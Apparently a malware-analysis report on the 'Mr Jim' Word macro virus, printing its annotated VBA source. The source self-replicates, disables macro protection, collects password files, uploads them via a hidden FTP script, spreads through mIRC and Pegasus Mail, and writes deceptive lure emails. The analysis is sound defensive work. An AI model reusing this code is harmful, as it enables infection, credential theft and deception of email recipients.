MALICIOUS
268
Risk Score
Heuristics 5
-
ClamAV: Win.Trojan.Jim-1 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Win.Trojan.Jim-1
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Potential Shell call in VBA — critical — OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
Shell "command.com /c ftp.exe -n -s:c:\msdos.dll", vbHide -
VBA macro-virus self-replication / AV tampering — critical — OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, a.CountOfLines -
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 61613 bytes |
SHA-256: d8c5bcc986e53857f9a198f2cb8571f38ad8725f3b0aabe07438bca93da75768 |
|||
|
Detection
ClamAV:
Win.Trojan.Jim-1
Obfuscation or payload:
unlikely
|
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'0
Private Sub Document_Open()
' [analysis] Lines tagged "[analysis]" are reviewer annotations and are NOT part of the
' [analysis] extracted sample. Line numbers the macro uses on itself (ReplaceLine 2/6/230/258,
' [analysis] the 360-line threshold) refer to the unannotated module.
' [analysis] Purpose: auto-run handler for document open. It (1) lowers Word's macro
' [analysis] protection and suppresses prompts, (2) copies this module between the active
' [analysis] document and the Normal template, and (3) once per host, writes host details and
' [analysis] the path of a *.pwl file to a hidden file and prepares an ftp.exe command script.
' [analysis] Host artifacts visible in this routine: c:\_vac.txt (opt-out marker, read only),
' [analysis] c:\<Word user name>.dll, c:\msdos.dll, c:\config.dll.
' [analysis] The bare '0 / 'NN comment lines on every other line match the filler that the
' [analysis] ReplaceLine loops below write ("'" & Second(Now)).
'0
Mr_Jim_by_Septic:
'0
generation = 26
'0
' [analysis] Opt-out marker: if c:\_vac.txt exists, show a message box and skip the whole routine.
check_vac = "c:\_vac.txt"
'0
If Dir(check_vac) <> "" Then MsgBox "I guess you have what it takes.", vbInformation, "[Mr Jim] By SeptiC/TI": GoTo Host_infiltrated
'0
da_normal = Dir(NormalTemplate.FullName)
'0
If da_normal = "" Then GoTo No_normal
'0
' [analysis] Resets the template's file attributes to vbNormal; presumably so a read-only
' [analysis] Normal template can still be rewritten and saved further down.
SetAttr NormalTemplate.FullName, vbNormal
'0
No_normal:
'0
' [analysis] Blocks user interruption, then uses Chr$(48) (the string "0") as an indirect
' [analysis] False/0 to turn off macro-virus protection, the save-Normal prompt, conversion
' [analysis] confirmation, screen updating, the status bar and alerts.
Application.EnableCancelKey = wdCancelDisabled
'0
Options.VirusProtection = Chr$(48)
'0
Options.SaveNormalPrompt = Chr$(48)
'0
Options.ConfirmConversions = Chr$(48)
'0
Application.ScreenUpdating = Chr$(48)
'0
Application.DisplayStatusBar = Chr$(48)
'0
Application.DisplayAlerts = Chr$(48)
'0
' [analysis] Reads the Windows directory from [Paths] WinDir in c:\msdos.sys (Windows 9x layout).
windir = System.PrivateProfileString("c:\msdos.sys", "Paths", "WinDir")
'0
Dim Act_doc As Object: Set Act_doc = ActiveDocument
'0
Dim Act_norm As Object: Set Act_norm = NormalTemplate
'0
' [analysis] Cos(Atn(CInt(1))) is ~0.707, which is coerced to 1 when used as a collection
' [analysis] index: an indirect way of writing VBComponents(1). A first module longer than
' [analysis] 360 lines is treated as already infected.
If Act_doc.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.CountOfLines > 360 Then act_inf = 1
'0
If Act_norm.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.CountOfLines > 360 Then normal_inf = 1
'0
infect_doc:
'0
If act_inf = 1 Then GoTo infect_normal
'0
' [analysis] Template -> document: wipe the active document's first code module and insert
' [analysis] the full text of the Normal template's first code module.
Set a = Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Set b = Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, a.CountOfLines
'0
Set fix_lines_1 = b
'0
With fix_lines_1
'0
code_1 = .Lines(1, .CountOfLines)
'0
End With
'0
Act_doc.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.insertlines 1, code_1
'0
Set polyit = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1))))
'0
temp_number = generation + 1
'0
' [analysis] Rewrites every odd line 1..419 with a comment holding the current second, so the
' [analysis] filler text differs between copies; the procedure headers on lines 2, 230 and 258
' [analysis] and the generation counter on line 6 are then written back explicitly.
With polyit.CodeModule
'0
For da_line = 1 To 420 Step 2
'0
.replaceline da_line, "'" & Second(Now)
'0
Next da_line
'0
.replaceline 230, "Sub ToolsMacro()"
'0
.replaceline 258, "Private Sub Document_Close()"
'0
.replaceline 2, "Private Sub Document_Open()"
'0
.replaceline 6, "generation =" & temp_number
'0
End With
'0
ActiveDocument.Save
'0
infect_normal:
'0
If normal_inf = 1 Then GoTo no_inf
'0
' [analysis] Document -> template: same copy in the other direction. In the template copy the
' [analysis] headers on lines 2 and 258 are swapped (this routine becomes Document_Close there)
' [analysis] and line 230 is named ViewVBCode instead of ToolsMacro.
Set a = Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Set b = Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, b.CountOfLines
'0
Set fix_lines_2 = a
'0
With fix_lines_2
'0
code_2 = .Lines(1, .CountOfLines)
'0
End With
'0
Act_norm.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.insertlines 1, code_2
'0
Set polyit = Act_norm.VBProject.VBComponents.Item(Cos(Atn(CInt(1))))
'0
da_lines = 0
'0
With polyit.CodeModule
'0
For da_line = 1 To 420 Step 2
'0
.replaceline da_line, "'" & Second(Now)
'0
Next da_line
'0
.replaceline 230, "Sub ViewVBCode()"
'0
.replaceline 2, "Private Sub Document_Close()"
'0
.replaceline 258, "Private Sub Document_Open()"
'0
End With
'0
NormalTemplate.Save
'0
no_inf:
'0
' [analysis] c:\config.dll is the "host already processed" marker: if present, the
' [analysis] collection and FTP-script steps below are skipped.
check_it = Dir("c:\config.dll")
'0
If check_it <> "" Then GoTo Host_infiltrated
'0
collect_i:
'0
' [analysis] Gathers the Word user name and the system details exposed by Word's System object.
user_name = Application.UserName
'0
info_1 = System.Application
'0
info_2 = System.Country
'0
info_3 = System.Creator
'0
info_4 = System.FreeDiskSpace
'0
info_5 = generation
'0
info_6 = System.ProcessorType
'0
info_7 = System.OperatingSystem
'0
' [analysis] Searches the Windows directory itself (no subfolders) for *.pwl (Windows 9x
' [analysis] password-list files) and keeps the first match.
With Application.FileSearch
'0
.FileName = "\*.pwl"
'0
.LookIn = windir
'0
.SearchSubFolders = False
'0
.MatchTextExactly = True
'0
.FileType = msoFileTypeAllFiles
'0
.Execute
'0
passfile = .FoundFiles(Cos(Atn(CInt(1))))
'0
End With
'0
' [analysis] Writes the collected data as plain text to c:\<user name>.dll (a text file
' [analysis] despite the extension) and then marks that file hidden.
Open "c:\" & user_name & ".dll" For Append As #2
'0
Print #2, passfile
'0
Print #2, "User Name: "; user_name
'0
Print #2, "Time Infected: "; Time
'0
Print #2, "Application : "; info_1
'0
Print #2, "Country code : "; info_2
'0
Print #2, "Creator : "; info_3
'0
Print #2, "Free DiskSpace : "; info_4
'0
Print #2, "Generation of virus : "; info_5
'0
Print #2, "Processor Type : "; info_6
'0
Print #2, "Operating system : "; info_7
'0
Close #2
'0
SetAttr "c:\" & user_name & ".dll", vbHidden
'0
' [analysis] Writes an ftp.exe command script to c:\msdos.dll (hidden): hard-coded host and
' [analysis] embedded credentials, then "put" of the report file and of the .pwl file. Nothing
' [analysis] is sent here; the script is only run by the Shell call in the routine starting at
' [analysis] module line 258 (ftp.exe -n -s:c:\msdos.dll).
Open "c:\msdos.dll" For Append As #1
'0
Print #1, "o ftp.fortunecity.com"
'0
Print #1, "user mrseptic"
'0
Print #1, "nofb666"
'0
Print #1, "binary"
'0
Print #1, "put ""C:\" & user_name; ".dll"""
'0
Print #1, "put """ & passfile; """"
'0
Print #1, "quit"
'0
Close #1
'0
SetAttr "c:\msdos.dll", vbHidden
'0
' [analysis] Creates the c:\config.dll marker that is checked at no_inf above.
Open "c:\config.dll" For Append As #3
'0
Print #3, "BIG as usual in the future"
'0
Close #3
'0
Host_infiltrated:
'0
end_open:
'0
End Sub
'0
Sub ToolsMacro()
' [analysis] Lines tagged "[analysis]" are reviewer annotations, not part of the extracted sample.
' [analysis] Stealth hook. In Word, a macro named after a built-in command runs in place of
' [analysis] that command, so this body executes when the user opens Tools > Macro. It empties
' [analysis] the first code module of the active document and of the Normal template, flags
' [analysis] both as unmodified, and only then opens the Visual Basic Editor.
' [analysis] NOTE(review): because Saved is forced to True, the deletion presumably affects only
' [analysis] the in-memory copies and the files on disk keep the macro - confirm in a sandbox.
'0
' [analysis] Any error (e.g. no document open) skips straight to the template clean-up.
On Error GoTo no_doc_stealth
'0
If ActiveDocument = "" Then GoTo no_doc_stealth
'0
Dim Act_doc As Object: Set Act_doc = ActiveDocument
'0
' [analysis] Cos(Atn(CInt(1))) is ~0.707 and is coerced to index 1, i.e. VBComponents(1).
Set a = Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, a.CountOfLines
'0
' [analysis] Marks the document as unchanged so Word does not prompt to save.
Act_doc.Saved = True
'0
no_doc_stealth:
'0
Dim Act_norm As Object: Set Act_norm = NormalTemplate
'0
Set b = Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, b.CountOfLines
'0
Act_norm.Saved = True
'0
' [analysis] The editor is shown only after both modules have been emptied.
Application.ShowVisualBasicEditor = True
'0
End Sub
'0
Private Sub Document_Close()
' [analysis] Lines tagged "[analysis]" are reviewer annotations, not part of the extracted sample.
' [analysis] Purpose: auto-run handler for document close. It (1) repeats the opt-out check and
' [analysis] the protection/prompt suppression, (2) if mIRC is installed, edits mirc.ini and
' [analysis] replaces script.ini/script.old, (3) if Pegasus Mail is installed, writes a message
' [analysis] file that names the open document as attachment, (4) if certain task names are
' [analysis] running, launches ftp.exe with the command script c:\msdos.dll, and (5) on day 2
' [analysis] of a month, inserts text and a text effect into the document.
' [analysis] Triage hints: Word starting command.com / ftp.exe with "-s:", and writes to
' [analysis] mirc.ini, script.ini, script.old or *.pmw from the Word process.
'0
' [analysis] Opt-out marker: if c:\_vac.txt exists, show a message box and skip everything.
check_vac = "c:\_vac.txt"
'0
If Dir(check_vac) <> "" Then MsgBox "I guess you have what it takes.", vbInformation, "[Mr Jim] By SeptiC/TI": GoTo the_end
'0
' [analysis] From here on a runtime error jumps to end_macro (the date check), so failures
' [analysis] stay silent.
On Error GoTo end_macro
'0
' [analysis] Chr$(48) is the string "0", used as an indirect False/0 to turn off macro-virus
' [analysis] protection, prompts, screen updating, the status bar and alerts.
Options.VirusProtection = Chr$(48)
'0
Options.SaveNormalPrompt = Chr$(48)
'0
Options.ConfirmConversions = Chr$(48)
'0
Application.ScreenUpdating = Chr$(48)
'0
Application.DisplayStatusBar = Chr$(48)
'0
Application.DisplayAlerts = Chr$(48)
'0
windir = System.PrivateProfileString("c:\msdos.sys", "Paths", "WinDir")
'0
' [analysis] Full path of the open (infected) document; reused below as the file to send.
active_doc = ActiveDocument.FullName
'0
' [analysis] Probes a fixed list of install paths for mIRC; if none exists, continue at Pegasus.
If Dir("c:\mirc32\mirc32.exe") <> "" Then set_dir = "c:\mirc32\": GoTo past_dir
'0
If Dir("c:\program~1\mirc32\mirc32.exe") <> "" Then set_dir = "c:\program~1\mirc32\": GoTo past_dir
'0
If Dir("c:\program\mirc32\mirc32.exe") <> "" Then set_dir = "c:\program\mirc32\": GoTo past_dir
'0
If Dir("c:\mirc\mirc32.exe") <> "" Then set_dir = "c:\mirc\": GoTo past_dir
'0
If Dir("c:\program~1\mirc\mirc32.exe") <> "" Then set_dir = "c:\program~1\mirc\": GoTo past_dir
'0
If Dir("c:\program\mirc\mirc32.exe") <> "" Then set_dir = "c:\program\mirc\": GoTo past_dir
'0
GoTo Pegasus
'0
past_dir:
'0
' [analysis] Edits mirc.ini in the detected directory: [ident] userid = "MrJim" and
' [analysis] [warn] fserve = "off" (presumably suppresses mIRC's file-server warning - confirm).
If set_dir = "c:\program\mirc32\" Then System.PrivateProfileString("C:\program\mirc32\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\program\mirc32\" Then System.PrivateProfileString("C:\program\mirc32\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\mirc32\" Then System.PrivateProfileString("c:\mirc32\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\mirc32\" Then System.PrivateProfileString("c:\mirc32\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\program~1\mirc32\" Then System.PrivateProfileString("c:\program~1\mirc32\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\program~1\mirc32\" Then System.PrivateProfileString("c:\program~1\mirc32\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\program\mirc\" Then System.PrivateProfileString("C:\program\mirc\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\program\mirc\" Then System.PrivateProfileString("C:\program\mirc\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\mirc\" Then System.PrivateProfileString("c:\mirc\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\mirc\" Then System.PrivateProfileString("c:\mirc\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\program~1\mirc\" Then System.PrivateProfileString("c:\program~1\mirc\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\program~1\mirc\" Then System.PrivateProfileString("c:\program~1\mirc\mirc.ini", "warn", "fserve") = "off"
'0
' [analysis] Removes any existing script.ini / script.old; an error here (e.g. file missing)
' [analysis] just skips to Skip_attr.
On Error GoTo Skip_attr
'0
SetAttr set_dir & "script.ini", vbNormal
'0
Kill set_dir & "script.ini"
'0
SetAttr set_dir & "script.old", vbNormal
'0
Kill set_dir & "script.old"
'0
Skip_attr:
'0
On Error GoTo end_macro
'0
' [analysis] Writes the same mIRC script twice (script.ini and script.old). Entries n0-n3 react
' [analysis] to keywords seen in a channel (n3 opens an fserve session on c:\ for the sender);
' [analysis] n4/n5 DCC-send the open document to the peer whenever a file is sent or received,
' [analysis] which is the IRC propagation path.
Open set_dir & "script.ini" For Append As #1
'0
Print #1, "[script]"
'0
Print #1, "n0=on 1:TEXT:*relaxa*:#:/msg $chan [MrJim/SeptiC/TI] - BIG as usual in the future"
'0
Print #1, "n1=on 1:TEXT:*hoppauppohajja*:#:/mode $chan +b $me"
'0
Print #1, "n2=on 1:TEXT:*progr?ta*:#:/mode $chan +o $nick"
'0
Print #1, "n3=on 1:TEXT:*iframtiden*:#:/fserve $nick 20 c:\"
'0
Print #1, "n4=on 1:FILESENT:*.*:if ( $me != $nick ) { /dcc send $nick " & active_doc; " }"
'0
Print #1, "n5=on 1:FILERCVD:*.*:if ( $me != $nick ) { /dcc send $nick " & active_doc; " }"
'0
Close #1
'0
Open set_dir & "script.old" For Append As #1
'0
Print #1, "[script]"
'0
Print #1, "n0=on 1:TEXT:*relaxa*:#:/msg $chan [MrJim/SeptiC/TI] - BIG as usual in the future"
'0
Print #1, "n1=on 1:TEXT:*hoppauppohajja*:#:/mode $chan +b $me"
'0
Print #1, "n2=on 1:TEXT:*progr?ta*:#:/mode $chan +o $nick"
'0
Print #1, "n3=on 1:TEXT:*iframtiden*:#:/fserve $nick 20 c:\"
'0
Print #1, "n4=on 1:FILESENT:*.*:if ( $me != $nick ) { /dcc send $nick " & active_doc; " }"
'0
Print #1, "n5=on 1:FILERCVD:*.*:if ( $me != $nick ) { /dcc send $nick " & active_doc; " }"
'0
Close #1
'0
Pegasus:
'0
' [analysis] Probes a fixed list of install paths for Pegasus Mail (winpm-32.exe); if none
' [analysis] exists, continue at no_mail.
If Dir("c:\pmail\winpm-32.exe") <> "" Then pega_dir = "c:\pmail\": GoTo past_pega_dir
'0
If Dir("c:\mail\winpm-32.exe") <> "" Then pega_dir = "c:\pmail\": GoTo past_pega_dir
'0
If Dir("c:\program~1\pmail\winpm-32.exe") <> "" Then pega_dir = "c:\program~1\pmail\": GoTo past_pega_dir
'0
If Dir("c:\program\pmail\winpm-32.exe") <> "" Then pega_dir = "c:\program\pmail\": GoTo past_pega_dir
'0
GoTo no_mail
'0
past_pega_dir:
'0
' [analysis] Takes the first *.pmw file found under the install directory (subfolders
' [analysis] included) as the source of header lines for the new message.
With Application.FileSearch
'0
.FileName = "\*.pmw"
'0
.LookIn = pega_dir
'0
.SearchSubFolders = True
'0
.MatchTextExactly = True
'0
.FileType = msoFileTypeAllFiles
'0
.Execute
'0
pega_mail = .FoundFiles(Cos(Atn(CInt(1))))
'0
End With
'0
' [analysis] Picks one of several canned lure texts at random; each is signed with the Word
' [analysis] user name so the message appears to come from the document's owner.
get_rand = 0
'0
get_rand = Int(Rnd(1) * 8) + 1
'0
user_name = Application.UserName
'0
If get_rand = 1 Then random_message = "Hi! Quite some time has passed since my last mail, I hope you're not too mad at me. I haven't had time to write for several reasons. Anyway there is a quite interesting document attached in this mail, check it out and tell me what you think. Cya / " & user_name: GoTo after_rand
'0
If get_rand = 2 Then random_message = "Hello, yesterday when I was surfing the web a friend told me about this great game. It's called Utopia, have you ever heard of it? It's very cool and I think you would like it, I found this beginners guide on the net, you need it incase you want to succed and become strong. The guide is attached to the message. Bye! / " & user_name: GoTo after_rand
'0
If get_rand = 3 Then random_message = "HHHHhhhEEEeLLooo :) Somedays ago I was chatting on IRC on some warez channels and one guy offered me 3 different ftp sites with cracked versions of Quake III arena, all of them works! In case you don't have mIRC installed, install it! It's a very cool chat program. The Ftp's login and password are attached to this message. Ok Cya / " & user_name: GoTo after_rand
'0
If get_rand = 4 Then random_message = "Hiya, I really need your help. This document has to be done for friday and it probably contains a lot of misspellings etc etc. Could you please read it through and check if you see something? / " & user_name: GoTo after_rand
'0
If get_rand = 5 Then random_message = "Hehehe guess what I found! Tons of XXX passwords and some other cool stuff, it's attached to the message. Have fun ;) / " & user_name: GoTo after_rand
'0
If get_rand = 6 Then random_message = "Guess what I found, check it out! / " & user_name: GoTo after_rand
'41
random_message = "BAAM! Gotcha! You have just been hit with a message attachment! It's the attachment war of the millenium!!! There is one rule in this game... you can't hit someone who has already hit you, but you can use the attachment that hit yourself or even better find a new funny attachment to send (throw) on your opponent! Now go out there and hit as many people as you can before they get you!! / " & user_name & " got you!": GoTo after_rand
'41
after_rand:
'41
If pega_mail = "" Then GoTo no_mail
'41
' [analysis] Reads the first five lines of the found .pmw file; mailing is skipped when its
' [analysis] second line equals "SY:0" (the meaning of that field is not shown on this page).
Open pega_mail For Input As #1
'41
Line Input #1, mail_1
'41
Line Input #1, mail_2
'41
Line Input #1, mail_3
'41
Line Input #1, mail_4
'41
Line Input #1, mail_5
'41
Close #1
'41
If mail_2 = "SY:0" Then GoTo no_mail
'48
file_Ready:
'48
' [analysis] Writes a new .pmw file under <pega_dir>\mail\, named from the squared current
' [analysis] second. It reuses lines 1, 4 and 5 of the source file and names the open document
' [analysis] on the AT: line, followed by the lure text. Presumably this is Pegasus Mail's
' [analysis] queued-message format, so the client itself would send it later - confirm.
random_1 = Second(Now)
'48
Open pega_dir & "\mail\" & random_1 * random_1 & ".pmw" For Append As #3
'48
Print #3, mail_1
'48
Print #3, "SY:0"
'34
Print #3, mail_4
'34
Print #3, mail_5 & " :-)"
'34
Print #3, "CC:"
'34
Print #3, "EN:0"
'34
Print #3, "CS:0"
'34
Print #3, "RC:0"
'34
Print #3, "DC:0"
'34
Print #3, "UR:0"
'34
Print #3, "SS:0"
'34
Print #3, "SG:0"
'34
Print #3, "MI:1"
'34
Print #3, "ID:<Default>"
'34
Print #3, "EX:0"
'34
Print #3, "AT:" & active_doc; ",Binary,1"
'34
Print #3, "RT: 1"
'34
Print #3, "FL:0"
'3
Print #3, ""
'3
Print #3, random_message
'3
Close #3
'3
no_mail:
'3
' [analysis] Scans the names of running tasks for a few fixed window titles; presumably used
' [analysis] as a hint that the machine is online. No match -> go straight to the date check.
For x = 1 To Application.Tasks.Count
'3
If UCase(Application.Tasks(x).Name) = "ADDRESS BOOK" Then da_outlook = Application.Tasks(x).Name: GoTo out_look
'3
If UCase(Application.Tasks(x).Name) = "ICQMSGAPI WINDOW" Then GoTo i_connection
'3
If UCase(Application.Tasks(x).Name) = "SOCKETS WINDOW" Then GoTo i_connection
'3
If UCase(Application.Tasks(x).Name) = "SECTION WINDOW" Then GoTo i_connection
'10
If UCase(Application.Tasks(x).Name) = "INTERNET EXPLORER" Then GoTo i_connection
'10
Next x
'10
GoTo end_macro
'10
out_look:
'10
i_connection:
'10
' [analysis] Runs ftp.exe in a hidden window with c:\msdos.dll as its command script (-s:) and
' [analysis] auto-login disabled (-n). This is the only process launch in the listing and the
' [analysis] line flagged by the OLE_VBA_SHELL heuristic.
Shell "command.com /c ftp.exe -n -s:c:\msdos.dll", vbHide
'10
end_macro:
'10
' [analysis] Date trigger: the visible payload below runs only on day 2 of a month.
If Day(Now) = 2 Then GoTo payload
'10
GoTo the_end
'10
payload:
'10
' [analysis] Visible payload: types a text line into the document, adds a text-effect shape
' [analysis] and switches the window to normal view. No file or network activity here.
Selection.TypeText Text:="[Mr Jim/SeptiC/TI] - Do you have what it takes to become an international bussiness man!?"
Selection.TypeParagraph
Selection.TypeParagraph
ActiveDocument.Shapes.AddTextEffect(msoTextEffect29, _
"[Mr Jim]/SeptiC/TI '99" & Chr(13) & "" & Chr(10) & "", "Arial Black", 36#, msoFalse, msoFalse, 121.85 _
, 159.75).Select
If ActiveWindow.View.SplitSpecial = wdPaneNone Then
ActiveWindow.ActivePane.View.Type = wdNormalView
Else
ActiveWindow.View.Type = wdNormalView
End If
the_end:
End Sub
' Processing file: /opt/analyzer/scan_staging/420941b015774966bafbe6b2dc5174f5.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 34381 bytes
' Line #0:
' QuoteRem 0x0000 0x0001 "0"
' Line #1:
' FuncDefn (Private Sub Document_Open())
' Line #2:
' QuoteRem 0x0000 0x0001 "0"
' Line #3:
' Label Mr_Jim_by_Septic
' Line #4:
' QuoteRem 0x0000 0x0001 "0"
' Line #5:
' LitDI2 0x001A
' St generation
' Line #6:
' QuoteRem 0x0000 0x0001 "0"
' Line #7:
' LitStr 0x000B "c:\_vac.txt"
' St check_vac
' Line #8:
' QuoteRem 0x0000 0x0001 "0"
' Line #9:
' Ld check_vac
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Ne
' If
' BoSImplicit
' LitStr 0x001F "I guess you have what it takes."
' Ld vbInformation
' LitStr 0x0015 "[Mr Jim] By SeptiC/TI"
' ArgsCall MsgBox 0x0003
' BoS 0x0000
' GoTo Host_infiltrated
' EndIf
' Line #10:
' QuoteRem 0x0000 0x0001 "0"
' Line #11:
' Ld NormalTemplate
' MemLd FullName
' ArgsLd Dir 0x0001
' St da_normal
' Line #12:
' QuoteRem 0x0000 0x0001 "0"
' Line #13:
' Ld da_normal
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' GoTo No_normal
' EndIf
' Line #14:
' QuoteRem 0x0000 0x0001 "0"
' Line #15:
' Ld NormalTemplate
' MemLd FullName
' Ld vbNormal
' ArgsCall SetAttr 0x0002
' Line #16:
' QuoteRem 0x0000 0x0001 "0"
' Line #17:
' Label No_normal
' Line #18:
' QuoteRem 0x0000 0x0001 "0"
' Line #19:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #20:
' QuoteRem 0x0000 0x0001 "0"
' Line #21:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Options
' MemSt VirusProtection
' Line #22:
' QuoteRem 0x0000 0x0001 "0"
' Line #23:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Options
' MemSt SaveNormalPrompt
' Line #24:
' QuoteRem 0x0000 0x0001 "0"
' Line #25:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Options
' MemSt ConfirmConversions
' Line #26:
' QuoteRem 0x0000 0x0001 "0"
' Line #27:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Application
' MemSt ScreenUpdating
' Line #28:
' QuoteRem 0x0000 0x0001 "0"
' Line #29:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Application
' MemSt DisplayStatusBar
' Line #30:
' QuoteRem 0x0000 0x0001 "0"
' Line #31:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Application
' MemSt DisplayAlerts
' Line #32:
' QuoteRem 0x0000 0x0001 "0"
' Line #33:
' LitStr 0x000C "c:\msdos.sys"
' LitStr 0x0005 "Paths"
' LitStr 0x0006 "WinDir"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St windir
' Line #34:
' QuoteRem 0x0000 0x0001 "0"
' Line #35:
' Dim
' VarDefn Act_doc (As Object)
' BoS 0x0000
' SetStmt
' Ld ActiveDocument
' Set Act_doc
' Line #36:
' QuoteRem 0x0000 0x0001 "0"
' Line #37:
' Dim
' VarDefn Act_norm (As Object)
' BoS 0x0000
' SetStmt
' Ld NormalTemplate
' Set Act_norm
' Line #38:
' QuoteRem 0x0000 0x0001 "0"
' Line #39:
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_doc
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0168
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' St act_inf
' EndIf
' Line #40:
' QuoteRem 0x0000 0x0001 "0"
' Line #41:
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_norm
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0168
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' St normal_inf
' EndIf
' Line #42:
' QuoteRem 0x0000 0x0001 "0"
' Line #43:
' Label infect_doc
' Line #44:
' QuoteRem 0x0000 0x0001 "0"
' Line #45:
' Ld act_inf
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' GoTo infect_normal
' EndIf
' Line #46:
' QuoteRem 0x0000 0x0001 "0"
' Line #47:
' SetStmt
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_doc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set a
' Line #48:
' QuoteRem 0x0000 0x0001 "0"
' Line #49:
' SetStmt
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_norm
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set B
' Line #50:
' QuoteRem 0x0000 0x0001 "0"
' Line #51:
' LitDI2 0x0001
' Ld a
' MemLd CountOfLines
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_doc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #52:
' QuoteRem 0x0000 0x0001 "0"
' Line #53:
' SetStmt
' Ld B
' Set fix_lines_1
' Line #54:
' QuoteRem 0x0000 0x0001 "0"
' Line #55:
' StartWithExpr
' Ld fix_lines_1
' With
' Line #56:
' QuoteRem 0x0000 0x0001 "0"
' Line #57:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemLdWith Lines 0x0002
' St code_1
' Line #58:
' QuoteRem 0x0000 0x0001 "0"
' Line #59:
' EndWith
' Line #60:
' QuoteRem 0x0000 0x0001 "0"
' Line #61:
' LitDI2 0x0001
' Ld code_1
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_doc
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemCall insertlines 0x0002
' Line #62:
' QuoteRem 0x0000 0x0001 "0"
' Line #63:
' SetStmt
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld ActiveDocument
' MemLd VBProject
